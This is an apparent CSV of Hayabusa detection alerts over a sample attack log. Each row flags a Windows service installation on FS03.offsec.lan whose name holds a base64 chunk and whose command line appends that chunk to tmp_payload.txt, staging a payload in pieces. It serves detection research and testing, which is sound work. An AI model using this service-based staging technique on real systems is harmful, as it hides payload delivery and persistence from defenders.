2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
